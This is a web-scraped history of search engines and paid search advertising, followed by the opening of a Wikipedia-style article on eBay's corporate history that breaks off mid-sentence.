dropout named Scott Banister came up with the idea of charging search advertisers by the click with ads tied to the search keyword. He promoted it to the likes of Yahoo , but their (lack of) vision was corrupted by easy money, so they couldn't see the potential of search. The person who finally ran with Mr. Banister's idea was IdeaLab's Bill Gross. Overture, the pioneer in paid search, was originally launched by Bill Gross under the name GoTo in 1998. His idea was to arbitrage traffic streams and sell them with a level of accountability. John Battelle's The Search has an entertaining section about Bill Gross and the formation of overture. John also published that section on his blog. “The more I thought about it , the more I realized that the true value of the Internet was in its accountability, Gross tells me. “Performance guarantees had to be the model for paying for media. Gross knew offering virtually risk-free clicks in an overheated and ravenous market ensured GoTo would takeoff. And while it would be easy to claim that GoTo worked because of the Internet bubble’s ouroboros-like hunger for traffic, the company managed to outlast the bust for one simple reason: it worked. While Overture was wildly successful, it had two major downfalls which prevented them from taking Google's market position: Those two faults meant that Overture was heavily reliant on it's two largest distribution partners - Yahoo and Microsoft. Overture bought out AltaVista and AllTheWeb to try to win some leverage, but ultimately they sold out to Yahoo on July 14, 2003 for $1.63 billion. Google AdWords launched in 2000. The initial version was a failure because it priced ads on a flat CPM model. Some keywords were overpriced and unaffordable, while others were sold inefficiently at too cheap of a price. In February of 2002, Google relaunched AdWords selling the ads in an auction similar to Overture's, but also adding ad clickthrough rate in as a factor in the ad rankings. Affiliates and other web entrepreneurs quickly took to AdWords because the precise targeting and great reach made it easy to make great profits from the comfort of your own home, while sitting in your underwear :) Over time, as AdWords became more popular and more mainstream marketers adopted it, Google began closing some holes in their AdWords product. For example, to fight off noise and keep their ads as relevant as possible, they disallowed double serving of ads to one website. Later they started looking at landing page quality and establishing quality based minimum pricing, which squeezed the margins of many small arbitrage and affiliate players. Google intends to take the trackable ad targeting allowed by AdWords and extend it into other mediums. Google has already tested print and newspaper ads. Google allows advertisers to buy graphic or video ads on content websites. On January 17, 2006, Google announced they bought dMarc Broadcasting, which is a company they will use to help Google sell targeted radio ads. On September 15, 2006, Google partnered with Intuit to allow small businesses using QuickBooks to buy AdWords from within QuickBooks. The goal is to help make local ads more relevant by getting more small businesses to use AdWords. On March 20, 2007, Google announced they were beta testing creating a distributed pay per action affiliate ad network. On April 13, 2007 Google announced the purchase of DoubleClick for $3.1 billion. On March 4, 2003 Google announced their content targeted ad network. In April 2003, Google bought Applied Semantics, which had CIRCA technology that allowed them to drastically improve the targeting of those ads. Google adopted the name AdSense for the new ad program. AdSense allows web publishers large and small to automate the placement of relevant ads on their content. Google initially started off by allowing textual ads in numerous formats, but eventually added image ads and video ads. Advertisers could chose which keywords they wanted to target and which ad formats they wanted to market. To help grow the network and make the market more efficient Google added a link which allows advertisers to sign up for AdWords account from content websites, and Google allowed advertisers to buy ads targeted to specific websites, pages, or demographic categories. Ads targeted on websites are sold on a cost per thousand impression (CPM) basis in an ad auction against other keyword targeted and site targeted ads. Google also allows some publishers to place AdSense ads in their feeds, and some select publishers can place ads in emails. To prevent the erosion of value of search ads Google allows advertisers to opt out of placing their ads on content sites, and Google also introduced what they called smart pricing. Smart pricing automatically adjusts the click cost of an ad based on what Google perceives a click from that page to be worth. An ad on a digital camera review page would typically be worth more than a click from a page with pictures on it. Google was secretive about its revenue share since the inception of AdSense, but due to a lawsuit in Italy Google feared they would be stuck disclosing their revenue share, so they decided to do so publicly for good public relations on May 24, 2010. Google keeps 32% while giving publishers 68% of contextual ad revenues. On search ads Google keeps 49% and gives publishers 51%. Some premium publishers are able to negotiate higher rates custom integration options as well. Yahoo Search Marketing is the rebranded name for Overture after Yahoo bought them out. As of September 2006 their platform is generally the exact same as the old Overture platform, with the same flaws - ad CTR not factored into click cost, it's hard to run local ads, and it is just generally clunky. Yahoo launched another ad platform named Gemini in 2014, however they only gave it a small share of their overall search inventory have relied heavily on Bing Ads for text ads and Google for Product Listing Ads in their search results. In 2000 Microsoft launched a keyword driven ad program called keywords, but shut it down after 2 months because they feared it would cannibalize their banner ad revenues. Microsoft AdCenter was launched on May 3. 2006. While Microsoft has limited marketshare, they intend to increase their marketshare by baking search into Internet Explorer 7. On the features front, Microsoft added demographic targeting and dayparting features to the pay per click mix. Microsoft's ad algorithm includes both cost per click and ad clickthrough rate. Microsoft also created the XBox game console, and on May 4, 2006 announced they bought a video game ad targeting firm named Massive Inc. Eventually video game ads will be sold from within Microsoft AdCenter. Windows 10 pushes Bing as a default search tool aggressively, which in turn boosts distribution for Bing search Bing Ads. Search engine optimization is the art and science of publishing information in a format which will make search engines believe that your content satisfies the needs of their users for relevant search queries. SEO, like search, is a field much older than I am. In fact, it was not originally even named search engine optimization, and to this day most people are still uncertain where that phrase came from. Early search engine optimization consisted mostly of using descriptive file names, page titles, and meta descriptions. As search advanced on the page factors grew more important and then people started trying to aim for specific keyword densities. One of the big things that gave Google an advantage over their competitors was the introduction of PageRank, which graded the value of a page based on the number and quality of links pointing at it. Up until the end of 2003 search was exceptionally easy to manipulate. If you wanted to rank for something all you had to do was buy a few powerful links and place the words you wanted to rank for in the link anchor text. On November 15, 2003 Google began to heavily introduce many more semantic elements into its search product. Researchers and SEO's alike have noticed wild changes in search relevancy during that update and many times since then, but many searchers remain clueless to the changes. Search engines would prefer to bias search results toward informational resources to make the commercial ads on the search results appear more appealing. You can see an example of how search can be biased toward commercial or informational resources by playing with Yahoo Mindset. On January 18, 2005, Google, MSN, and Yahoo announced the release of a NoFollow tag which allows blog owners to block comment spam from passing link popularity. People continued to spam blogs and other resources, largely because search engines may still count some nofollow links, and largely because many of the pages they spammed still rank. Since 2003 Google has came out with many advanced filters and crawling patterns to help make quality editorial links count more and depreciate the value of many overtly obvious paid links or other forms of link manipulation. Older websites may be given more trust in relevancy algorithms than newer websites (just existing for a period of time is a signal of quality). All major search engines use human editors to help review content quality and help improve their relevancy algorithms. Search engines may factor in user acceptance and other usage data to help determine if a site needs reviewed for editorial quality and to help determine if linkage data is legitimate. Navigational or branded search queries may be used as a key signal to authenticate if a site's link profile was manufactured or authentic. Sites which people repeatedly seek out by name are sites which generally provide a good user experience. Google has also heavily pushed giving away useful software, tools, and services like free maps, email, web browser mobile phone OS which allow them to personalize search results based on the searcher's historical preferences. Google engineer Matt Cutts frequently comments that any paid link should have the nofollow attribute applied to it, although Google hypocritically does not place the nofollow attribute on links they buy. They also have placed their ads on the leading Warez site and continued to serve ads on sites that they banned for spamming. Yahoo Shopping has also been known to be a big link buyer. Much of the current search research is based upon the view that any form of marketing promotion SEO is spam. If that was true, it wouldn't make sense that Google is teaching SEO courses, which they do. In many verticals search is self reinforcing, as in a winner take most battle. Jakob Nielsen's The Power of Defaults notes that the top search result is clicked on as often as 42% of the time. Not only is the distribution and traffic stream highly disproportionate, but many people tend to link to the results that were easy to find, which makes the system even more self reinforcing, as noted in Mike Grehan's Filthy Linking Rich. A key thing to remember if you are trying to catch up with another website is that you have to do better than what was already done, and significantly enough better that it is comment worthy or citation worthy. You have to make people want to switch their world view to seeing you as an authority on your topic. Search engines will follow what people think. Google's corporate history page has a pretty strong background on Google, starting from when Larry met Sergey at Stanford right up to present day. In 1995 Larry Page met Sergey Brin at Stanford. By January of 1996, Larry and Sergey had begun collaboration on a search engine called BackRub, named for its unique ability to analyze the "back links" pointing to a given website. Larry, who had always enjoyed tinkering with machinery and had gained some notoriety for building a working printer out of Lego bricks, took on the task of creating a new kind of server environment that used low-end PCs instead of big expensive machines. Afflicted by the perennial shortage of cash common to graduate students everywhere, the pair took to haunting the department's loading docks in hopes of tracking down newly arrived computers that they could borrow for their network. A year later, their unique approach to link analysis was earning BackRub a growing reputation among those who had seen it. Buzz about the new search technology began to build as word spread around campus. BackRub ranked pages using citation notation, a concept which is popular in academic circles. If someone cites a source they usually think it is important. On the web, links act as citations. In the PageRank algorithm links count as votes, but some votes count more than others. Your ability to rank and the strength of your ability to vote for others depends upon your authority: how many people link to you and how trustworthy those links are. In 1998, Google was launched. Sergey tried to shop their PageRank technology, but nobody was interested in buying or licensing their search technology at that time. Later that year Andy Bechtolsheim gave them $100,000 seed funding, and Google received $25 million Sequoia Capital and Kleiner Perkins Caufield Byers the following year. In 1999 AOL selected Google as a search partner, and Yahoo followed suit a year later. In 2000 Google also launched their popular Google Toolbar. Google gained search market share year over year ever since. In 2000 Google relaunched their AdWords program to sell ads on a CPM basis. In 2002 they retooled the service, selling ads in an auction which would factor in bid price and ad clickthrough rate. On May 1, 2002, AOL announced they would use Google to deliver their search related ads, which was a strong turning point in Google's battle against Overture. In 2003 Google also launched their AdSense program, which allowed them to expand their ad network by selling targeted ads on other websites. Google used a two class stock structure, decided not to give earnings guidance, and offered shares of their stock in a Dutch auction. They received virtually limitless negative press for the perceived hubris they expressed in their "AN OWNER'S MANUAL" FOR GOOGLE'S SHAREHOLDERS. After some controversy surrounding an interview in Playboy, Google dropped their IPO offer range from $85 to $95 per share from $108 to $135. Google went public at $85 a share on August 19, 2004 and its first trade was at 11:56 am ET at $100.01. In addition to running the world's most popular search service, Google also runs a large number of vertical search services, including: Google's corporate mission statement is: However that statement includes many things outside of the traditional mindset of search, and Google maintains that ads are a type of information. This other information includes: In addition to having strong technology and a strong brand Google also pays for a significant portion of their search market share. On December 20, 2005 Google invested $1 billion in AOL to continue their partnership and buy a 5% stake in AOL. In February 2006 Google agreed to pay Dell up to $1 billion for 3 years of toolbar distribution. On August 7, 2006, Google signed a 3 year deal to provide search on MySpace for $900 million. On October 9, 2006 Google bought YouTube, a leading video site, for $1.65 billion in stock. Google also pays Mozilla and Opera hundreds of millions of dollars to be the default search provider in their browsers, bundles their Google Toolbar with software from Adobe and Sun Microsystems, and pays AdSense ad publishers $1 for Firefox Google Toolbar installs, or up to $2 for Google Pack installs. Google also builds brand exposure by placing Ads by Google on their AdSense ads and providing Google Checkout to commercial websites. Google Pack is a package of useful software including a Google Toolbar and software from many other companies. At the same time Google helps ensure its toolbar is considered good and its competitors don't use sleazy distribution techniques by sponsoring StopBadware.org. Google's distribution, vertical search products, and other portal elements give it a key advantage in best understanding our needs and wants by giving them the largest Database of Intentions. They have moved away from a pure algorithmic approach to a hybrid editorial approach. In April of 2007, Google started mixing recent news results in their organic search results. After Google bought YouTube they started mixing videos directly in Google search results. Since the Florida update in 2003 Google has looked much deeper into linguistics and link filtering. Google's search results are generally the hardest search results for the average webmaster to manipulate. Matt Cutts, Google's former lead engineer in charge of search quality, regularly blogged about SEO and search. Google also has an official blog. Matt Cutts went on leave with Google in 2014 officially resigned from the company at the end of 2016. On November 10, 2004, Google opened up their Google Advertising Professional program. Google also helps webmasters understand how Google is indexing their site via Google Webmaster Central. Google continues to add features and data to their webmaster console for registered webmasters while obfuscating publicly available data. For an informal look at what working at Google looked like from the inside from 1999 to 2005 you might want to try Xooglers, a blog by former Google brand manager Doug Edwards. In October of 2007 Google attempted to manipulate the public perception of people buying and selling links by announcing that they were going to penalize known link sellers, and then manually editing the toolbar PageRank scores of some well known blogs and other large sites. These PageRank edits did not change search engine rankings or traffic flows, as the PageRank update was entirely aesthetic. The net effect of these new algorithms other forms of obfuscation Google has introduced has been to make it much harder to rank independent websites owned by small companies, while making SEO easier for large companies that have significant usage signals associated with their websites. This has caused many SEO professionals to chase after servicing large corporate clients, as talent tends to follow the money. Yahoo was founded in 1994 by David Filo and Jerry Yang as a directory of websites. For many years they outsourced their search service to other providers, considering it secondary to their directory and other content features, but by the end of 2002 they realized the importance and value of search and started aggressively acquiring search companies. Overture purchased AllTheWeb and AltaVista in 2003. Yahoo purchased Inktomi in December, 2002, and then consumed Overture in July, 2003, and combined the technologies from the various search companies they bought to make a new search engine. Yahoo dumped Google in favor of their own in house technology on February 17, 2004. In addition to building out their core algorithmic search product, Yahoo has largely favored the concept of social search. On March 20, 2005 Yahoo purchased Flickr, a popular photo sharing site. On December 9, 2005, Yahoo purchased Del.icio.us, a social bookmarking site. Yahoo has also made a strong push to promote Yahoo Answers, a popular free community driven question answering service. Yahoo has a cool Netrospective of their first 10 years, a brief overview of their corporate history here, and Bill Slawski posted a list of many of the companies Yahoo consumed since Overture. On July 2, 2007, Yahoo launched their behaviorally targeted SmartAds product. On July 29, 2009, Yahoo decided to give up on search and signed a 10 year deal to syndicate Bing ads and algorithmic results on their website. Yahoo shut down their directory service in December of 2014. In 2014 Yahoo signed a deal to be the default search provider in Mozilla Firefox inside the United States. They also did a distribution deal with Oracle, however those revenue gains were short lived Yahoo kept losing share in online advertising web search. Over the years Yahoo not only exited the search business, but they also exited most of their other vertical businesses. The role of the general purpose web portal was relegated to irrelevancy through the combination of: Verizon announced they were acquiring the Yahoo operating business in July of 2016 for $4.83 billion. In 1998 MSN Search was launched, but Microsoft did not get serious about search until after Google proved the business model. Until Microsoft saw the light they primarily relied on partners like Overture, Looksmart, and Inktomi to power their search service. They launched their technology preview of their search engine around July 1st of 2004. They formally switched from Yahoo organic search results to their own in house technology on January 31st, 2005. MSN announced they dumped Yahoo 's search ad program on May 4th, 2006. On September 11, 2006, Microsoft announced they were launching their Live Search product. On June 1, 2009, Microsoft launched Bing, a new search service which changed the search landscape by placing inline search suggestions for related searches directly in the result set. For instance, when you search for credit cards they will suggest related phrases like Microsoft released a Bing SEO guide for Webmasters PDF which claimed that the additional keyword suggestions helped pull down search demand to lower listed results when compared against the old results 6 through 10 when using a single linear search result set. Conversely, the Google format tends to concentrate attention on the top few search listings. After extensive eye tracking Gord Hotchkiss named this pattern Google's Golden Triangle. While Yahoo has lost much of their relevance, Bing has built a formidable Google search competitor. They have narrowed the revenue gap against Google have built a profitable search business. Bing is strongest in the US market, while having a lower share outside of the US, in part due to Google driving aggressive installs of Google Chrome from Flash security updates promoting Chrome across Google properties the AdSense ad network. Google is more dominant in moble search than they are in desktop due to One would be foolish to think that there is not a better way to index the web, and a new creative idea is probably just under our noses. The fact that Microsoft is making a large investment into developing a new search technology should be some cause for concern for other major search engines. Through this course of history many smaller search engines have came and went, as the search industry has struggled to find a balance between profitability and relevancy. Some of the newer search engine concepts are web site clustering, semantics, and having industry specific smaller search engines portals, but search may get attacked from entirely different angles. On October 5, 2004 Bill Gross ( the founder of Overture and pioneer of paid search) relaunched Snap as a search engine with a completely transparent business model (showing search volumes, revenues, and advertisers). Snap has many advanced sorting features but it may be a bit more than what most searchers were looking for. People tend to like search for the perceived simplicity, even if the behind the scenes process is quite complex. Outside of technology there are four other frontiers search is being attacked commoditized from Some early search pioneers have tried to reboot search, but most these efforts have failed to gain a sustainable marketshare. Cuil was heavily hyped but quickly bust. Blekko launched with less hype lasted longer, but ultimately sold to IBM. Gigablast was founded in 2000 by Matt Wells. They are an open source search engine which has quietly existed for nearly 2 decades. Gabriel Weinberg founded DuckDuckGo in 2008. It leverages the core Bing index but differentiates through the search interface result features. They have done a great job of consistently growing off a small base is popular with many web developers in part for their search privacy features lack of result personalization. Some foreign markets have dominant local search services. Yandex is big in Russia. Baidu leads China. Naver is popular in South Korea. In 2005 the DoJ obtained search data from AOL, MSN, and Yahoo . Google denied the request, and was sued for search data in January of 2006. Google beat the lawsuit and was only required to hand over a small sample of data. In August of 2006 AOL Research released over 3 months worth of personal search data by 650,000 AOL users. A NYT article identified one of the searchers by name. In 2007 the European Union aggressively probed search companies aiming to limit data retention and maintain searcher privacy rights. As more people create content attention is becoming more scarce. Due to The Tragedy of the Commons many publishing businesses and business models will die. Many traditional publishing companies enjoyed the profits enabled by running what was essentially regionally based monopolies. Search, and other forms of online media, allow for better targeting and less wasteful more efficient business models. Due to growing irrelevancy, a fear of change, and a fear of disintermediation, many traditional publishing companies have fought search. In an interview by Danny Sullivan, Eric Schmidt stated he thought many of the lawsuits Google face are business deals done in a court room. In September of 2006 some Belgian newspaper companies won a copyright lawsuit against Google News which makes Belgium judges look like they do not understand how search or the internet work. Some publisher groups are trying to create an arbitrary information access protocol, Agence France Presse (AFP) sued Google to get them to drop their news coverage, and Google paid the AP a licensing fee. In early 2017 the Wall Street Journal opted out of Google's first-click free program. In turn they saw a 44% decline in organic search traffic the WSJ saw a fourfold increase in the rate of visitors converting to paying subscribers. In September of 2005 the Authors Guild sued Google. In October of 2005 major book publishing houses also sued Google over Google Print. Perfect 10, a pornography company, sued Google for including cached copies of stolen content in their image index, and for allowing publishers to collect income on stolen copyright content via Google AdSense. In May of 2000 a French judge required Yahoo to stop providing access to auctions selling Nazi memorabilia. Many requests for information removal are covered on Chilling Effects and by the EFF. Eric Goldman tracks these cases as well. In 1999 Playboy sued Excite and Netscape for selling banner impressions sold for searches for Playboy. Overture sued Google for patent infringement. Just prior to Google's IPO they settled with Yahoo (who by then bought out Overture) by giving them 2.7 million shares of class A Google stock. Geico took Google to court in the US for trademark violation because Google allowed Geico to be a keyword trigger to target competing ads. Geico lost this case on December 15, 2004. Around the same time Google lost a similar French trademark case filed by Louis Vuitton. Lane's Gifts sued Google for click fraud, but did not have a strong well put together case. Google's lawyers pushed them into a class wide out of court settlement of up to $90 million in AdWords credits. The March 2006 settlement aimed to absolve Google of any clickfraud related liabilities back through 2002, when Google launched their pay per click model. Ads for Shady Products Services In 2004 search engines in the United States stopped running ads for online casinos. In 2009 a US federal government sting operation busted Google for running ads promoting the illegal sale of steroids. The Chinese search engine Baidu faced domestic regulatory scrutiny after public outrage in response to a kid with cancer dying blaming his death on a bogus medical procedure marketed via Baidu ads. The impact on Baidu ad sales was major, driving a year over year decline in spite of rapid growth in web usage inside China. Baidu was also investigated for running stealth gambling ads at night. In 2016 Google stopped running payday loan ads in the United States. The US government requested that major search companies turned over a significant amount of search related data. Yahoo , MSN, and AOL gave up search data. The Google blog announced that Google fought the subpoena A judge stated that Google did not have to turn over search usage data. AOL not only shared information with the government, but AOL research also accidentally made search records public record. After the AOL data leak fiasco news of the NSA spying program most major search engines began encrypting user searches with secured search sessions. DuckDuckGo took things one step further by promising not to track or follow a user, or personalize search reuslts. Google aggressively tracks Android users was also fined $22.5 million by the FTC for overriding privacy features in Apple's Safari web browser. On June 27, 2017 the European Commission fined Google 2.42 billion for breaching EU antitrust rules. The specific fine was for Google's preferential placement of their shopping search results the European Commission is still investigating multiple other issues with Google including bundling defualt Android search placement. Each search company has its own business objectives and technologies to define relevancy. The three biggest issues search engines are fighting are In order to try to lock users in search engines offer things like free email, news search, blogging platform, content hosting, office software, calendars, and feature rich toolbars. In some cases the software or service is not only free, but it is expensive to provide. For example, Google does not profit from Google news, but they had to pay the AP content licensing fees, and hosting Google Video can't be cheap. In an attempt to collect more data, better target ads, and improve conversion rates Google offers The end goal of search is to commoditize the value of as many brands and markets as possible to keep adding value to the search box. They want to commoditize the value of creating content and increase the value of spreading ideas, the value of attention, and the importance of conversion. As they make the network more and more efficient they can eat more and more of the profits, which was a large part of the reasoning behind Jakob Nielson's Search Engines as Leeches on the Web. Because search aims to gain distribution by virtually any means possible the search engines that can do the best job of branding and get people to believe most in their goals ideals ecosystem win. Search engines are fighting many ways on this front, but not all of them are even on the web. For example, search engines are trying to attract the smartest minds by sharing research. Google goes so far as offering free pizza Google hires people to track webmaster feedback across the web. Matt Cutts frequently blogs about search and SEO because to him it is important for others to see search, SEO, and Google from his perspective. He offers free tips on Google Video in no small part because it was important for Google Video to beat out YouTube for Google to become the default video platform on the web. Once it was clear that Google lost the video battle to YouTube Google decided to buy them. Beyond just selling their company beliefs and ideology to get people excited about their field, acquire new workers, and get others to act in a way that benefits their business model search engines also provide APIs to make portions of their system open enough that they can leverage the free work of other smart, creative, and passionate people. Selling search as an ecosystem goes so far that Google puts out endless betas, allowing users to become unpaid testers and advocates of their products. Even if the other search engines matched Google on relevancy they still are losing the search war due to Google's willingness to take big risks, Google's brand strength, and how much better Google sells search as an ecosystem. Google wants to make content ad supported and freely accessible. On October 9, 2006, Google announced they were acquiring YouTube for $1.65 billion in stock. In March, 2007,Viacom sued Google YouTube for $1 billion for copyright infringement. In 2007 Microsoft pushed against Google's market position calling Google a copyright infringer (for scanning books) and doing research stating that many of Google's blogspot hosted blogs are spam. In 2006 and 2007 numerous social bookmarking and decentralized news sites became popular. Del.icio.us, a popular social bookmarking site, was bought out by Yahoo. Digg.com features fresh news and other items of interest on their home page based on user votes. In 1992 TREC was launched to support research within the information retrieval community by providing the infrastructure necessary for large-scale evaluation of text retrieval methodologies. In addition to helping support the evolution of search they also create special tracks for vertical search and popular publishing models. For example, in 2006 they created a blog track. Past TREC publications are posted here. There are a number of other popular conferences covering information retrieval. Search Science lists a number of conferences on the right side of the Search Science blog. There are also a number of conferences which talk about search primarily from a marketer's perspective. The three most well known conferences for are Many of the following have not been updated in years, or only cover a partial timeline of the search space, but as a collection they helped me out a lot. SearchEngineWatch is amazingly comprehensive if you piece together all of the articles Danny Sullivan has published. Search Engine History is published by Aaron Wall. 2006 - 2017 |
606 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/EBay | eBay Inc. ( i be EE-bay, often stylized as ebay or Ebay) is an American multinational e-commerce company based in San Jose, California, that allows users to buy or view items via retail sales through online marketplaces and websites in 190 markets worldwide. Sales occur either via online auctions or "buy it now" instant sales, and the company charges commissions to sellers upon sales. eBay was founded by Pierre Omidyar in September 1995. It has 132 million yearly active buyers worldwide and handled $73 billion in transactions in 2023, 48% of which was in the United States. In 2023, the company had a take rate (revenue as a percentage of volume) of 13.81%. 1 eBay is used by individuals, companies, as well as governments to purchase and sell almost any legal, non-controversial item. eBay's auctions use a Vickrey auction (sealed-bid) proxy bid system. Buyers and sellers may rate and review each other after each transaction, resulting in a reputation system. The eBay service is accessible via websites and mobile apps. Software developers can create applications that integrate with eBay through the eBay API. Merchants can also earn commissions from affiliate marketing programs by eBay. eBay was founded as AuctionWeb in California on September 4, 1995, by French-born Iranian-American computer programmer Pierre Omidyar as a hobby to make some extra money. 2 One of the first items sold on AuctionWeb was a broken laser pointer for $14.83. Astonished, Omidyar contacted the winning bidder to ask if he understood that the laser pointer was broken; the buyer explained: "I'm a collector of broken laser pointers. 3 In February 1996, Omidyar's internet service provider informed him that he would need to upgrade to a business account due to the high web traffic of his website. The monthly price increase from $30 to $250 prompted Omidyar to start charging eBay users. The website made $1,000 in its first month, which was more than it cost to run, and $2,500 in its second month. 2 Chris Agarpao was eBay's first employee; he processed mailed check payments. 4 Jeffrey Skoll was hired as the first president of the company in early 1996. 4 In November 1996, the company launched online auctions for airline seats, hotel rooms, cruise berths and other travel-related products in partnership with Electronic Travel Auctions. By that time, the company had hosted more than 200,000 auctions since its founding 14 months earlier. 5 The company changed the name of its service from AuctionWeb to eBay in September 1997, after Echo Bay Technology Group, Omidyar's consulting firm. The echobay.com domain name was already registered by Echo Bay Mines, a gold mining company, so Omidyar shortened it to eBay.com. In 1997, the company received $6.7 million in venture capital funding from Benchmark. 6 The frequently repeated story that eBay was founded to help Omidyar's fianc e trade Pez candy dispensers was fabricated in 1997 by public relations manager Mary Lou Song to give the media a human-interest story and to generate publicity with toy collectors. 4 The most purchased and sold items on the website were Beanie Babies, the most difficult toys to find in retail stores, accounting for 10% of all listings in 1997. Ty, the manufacturer, had set up a website whereby people could trade used Beanie Babies. However, it was overwhelmed with unsortable listings. With a user-friendly interface, eBay became popular with collectors. 7 Meg Whitman was appointed president and CEO in March 1998. At the time, the company had 30 employees, 500,000 users, and revenues of $4.7 million in the United States. 6 In July 1998, eBay acquired Jump, the developer and operator of Up4Sale, an advertising-supported auction website which at the time had 27,000 separate auctions and 50,000 registered members. 8 In September 1998, during the dot-com bubble, eBay became a public company via an initial public offering led by CFO Gary F. Bengier. 9 Upon the initial public offering, which was priced at $18 per share and closed for trading on its first day at $53 per share, both Omidyar and Skoll became billionaires. 10 In the risk factors section of the annual report filed with the U.S. Securities and Exchange Commission in 1998, Omidyar noted eBay's dependence on the continued strength of the Beanie Babies market. 11 In June 2000, eBay acquired Half.com for $312 million in stock. 12 13 In 2000, eBay partnered with Escrow.com to handle escrow for purchases and sales of motor vehicles, later expanded to other transaction types. 14 By year-end, it had 22.5 million registered users and 79.4 million auctions per quarter. 15 In January 2001, eBay acquired a majority stake in Internet Auction Co. Ltd, operator of the largest internet auction website in South Korea. 16 In February 2002, eBay acquired iBazar, a French online auction site founded in 1998, for approximately $112 million in stock. 17 6 eBay entered the Chinese market in 2002 and shut down its Chinese site in 2007 due to competition from local rival Taobao. 18 19 In February 2002, eBay exited Japan due to competition from Yahoo Japan and began operations in Taiwan with the acquisition of NeoCom Technology for $9.5 million. 20 21 In June 2006, eBay turned over its operations in Taiwan to a joint venture partner. 22 eBay acquired PayPal on October 3, 2002 for $1.4 billion. 23 24 25 26 It phased out its Billpoint payment service in January 2003. 27 On May 28, 2003, in the case of eBay Inc. v. MercExchange, L.L.C., which had implications for the treatment of business method patents, a United States district court jury found eBay guilty of willful patent infringement and ordered the company to pay $35 million in damages after MercExchange accused eBay of infringing on three patents, one of which is used in eBay's "Buy It Now" feature. The decision was appealed to the United States Court of Appeals for the Federal Circuit (CAFC). The CAFC affirmed the judgment of willful infringement, and reversed the lower court and granted a permanent injunction. eBay appealed the permanent injunction to the Supreme Court of the United States, which on May 15, 2006 found an injunction is not required nor automatic in this or any patent case where guilt has been established. The case was sent back to the Virginia district court for consideration of the injunction and a trial on another MercExchange patent. 28 In August 2004, eBay acquired 25% of the classified advertising website Craigslist for $32 million. 29 30 Former disgruntled Craigslist executive Phillip Knowlton was the seller. 31 In December 2004, eBay acquired Rent.com for $415 million. 32 In March 2005, eBay launched Kijiji, a classified advertising website, in international markets. 33 It launched in the United States in July 2007. 34 35 36 In May 2005, eBay acquired Gumtree, a classified advertising website in the United Kingdom. 37 In October 2005, eBay Inc. acquired Skype Technologies for $2.6 billion. 38 39 40 ProStores was an e-commerce website hosting company owned by eBay. Formerly known as Kurant StoreSense, ProStores was acquired by eBay Inc. by the end of 2005 changing the name to ProStores by eBay. 41 ProStores' feature set included simple wizard-driven website, e-commerce capabilities, site design tools and e-business management. Smaller merchants could also manage the entire process of posting and selling products on eBay using the ProStores interface. It also offered inventory management, supplier communication and integration with Quickbooks and Dreamweaver. eBay announced on July 1, 2014 that support for the platform would end February 1, 2015. 42 In February 2006, Intuit launched a web-based version of ItsDeductible, a donation tracking service, using data from eBay to help users assign a market value to the items they donate. 43 In April 2006, eBay launched eBay Express, a site that was designed to work like a standard Internet shopping site, with fixed prices and no bidding involved. The website had 10 million items listed upon its launch. 44 45 46 47 The site was shut down in October 2008. 48 In January 2007, eBay acquired StubHub, an online marketplace for ticket resale, for $310 million. 49 50 51 52 In January 2008, Meg Whitman resigned as president and CEO of eBay to enter politics, and was replaced with John Donahoe. Whitman remained on the board of directors and continued to advise Donahoe through 2008. 53 In April 2008, eBay sued Craigslist, claiming that in January 2008, Craigslist took actions that "unfairly diluted eBay's economic interest by more than 10% , making eBay lose its seat on the board of directors of Craigslist. 54 Craigslist countersued in May 2008 alleging that eBay used its board seat to gain insider information about Craigslist that was used to compete against the company. 55 In September 2010, Delaware Judge William B. Chandler III ruled that the actions of Craigslist were unlawful and that the actions were taken by Craigslist founders Jim Buckmaster and Craig Newmark had "breached their fiduciary duty of loyalty", and restored eBay's stake in the company to 28.4% from a diluted level of 24.85%. 56 However, the judge dismissed eBay's objection to a staggered board provision, citing that Craigslist has the right to protect its own trade secrets. 57 58 56 In May 2008, eBay announced the opening of a building on the company's North Campus in San Jose, California, the first ground-up structure in the city to be built to LEED Gold standards. The building, the first the company had built in its 13 year existence, uses an array of 3,248 solar panels, spanning 60,000 square feet (5,600 m2), and providing 650 kilowatts of power, 15 18% of the company's total energy requirements, reducing carbon dioxide usage by 37 million pounds over 30 years. The building also has energy-efficient lighting and water system and most waste is recycled. 59 In April 2009, eBay agreed to acquire a controlling stake in G-Market, a South Korean online retailer, for $413 million. 60 61 In May 2009, eBay launched the Selling Manager Applications program (SM Apps). The program allows approved developers to integrate their applications directly into the eBay.com interface. 62 In November 2009, eBay sold a 70% stake in Skype to a consortium led by Silver Lake Partners and Marc Andreessen at a $2.75 billion valuation, while retaining a 30% minority ownership interest in Skype, after failing to integrate Skype into the company's online marketplace. 63 64 65 Microsoft acquired the entire company for $8.5 billion in May 2011. 66 In June 2011, eBay acquired GSI Commerce for $2.4 billion. 67 In June 2013, it was renamed eBay Enterprise. 68 In May 2012, RentPath, then known as Primedia, acquired Rent.com from eBay for approximately $415 million. 69 70 In September 2012, eBay introduced a new logo using a thinner variation of the Univers typeface. It replaced the thicker Univers logo. 71 72 73 In October 2012, eBay launched an international shipping partnership with Pitney Bowes whereby a seller of an item to be shipped internationally can send the item to a Pitney Bowes facility in their home country, which then forwards it to the international buyer, taking care of all international shipping requirements. 74 The company also launched a partnership with FedEx to offer discounted shipping options to sellers. 75 In November 2012, eBay was charged in the High-Tech Employee Antitrust Litigation, accused by the United States Department of Justice of entering into non-solicitation agreements with other technology companies involving highly skilled employees. 76 The litigation was settled in May 2014, with eBay required to end anti-competitive practices. 77 On September 30, 2014, eBay announced it would spin off PayPal into a separate publicly traded company, a demand made nine months prior by activist hedge fund magnate Carl Icahn. 78 79 The spinoff was completed on July 18, 2015. eBay's then chief executive, John Donahoe, stepped down from that role. 80 81 82 In January 2015, eBay acquired Vivanuncios, a classified advertising website in Mexico. 83 In June 2015, eBay sold its stake in Craigslist back to the company, ending the litigation. 84 85 86 87 In August 2015, eBay sold a portion of its stake in Snapdeal. 88 89 In September 2015, Propay and Skrill were eliminated as payment methods on the eBay website, citing low usage. 90 Flipkart and eBay entered into a strategic partnership in July 2017 under which eBay acquired a 5.44% stake in Flipkart in exchange for the contribution of its India business unit valued at $211 million and a $514 million cash investment in Flipkart. Flipkart launched a program to allow its sellers to sell to customers globally in partnership with eBay. eBay reported a gain of $167 million on the sale of its India operations. 91 92 93 94 In May 2018, eBay sold its stake in Flipkart to Walmart and relaunched its operations in India. 95 In August 2017, eBay shut Half.com. 96 In October 2017, eBay released image retrieval capability allowing users to find listings on the site that match an item depicted in a photo, using artificial 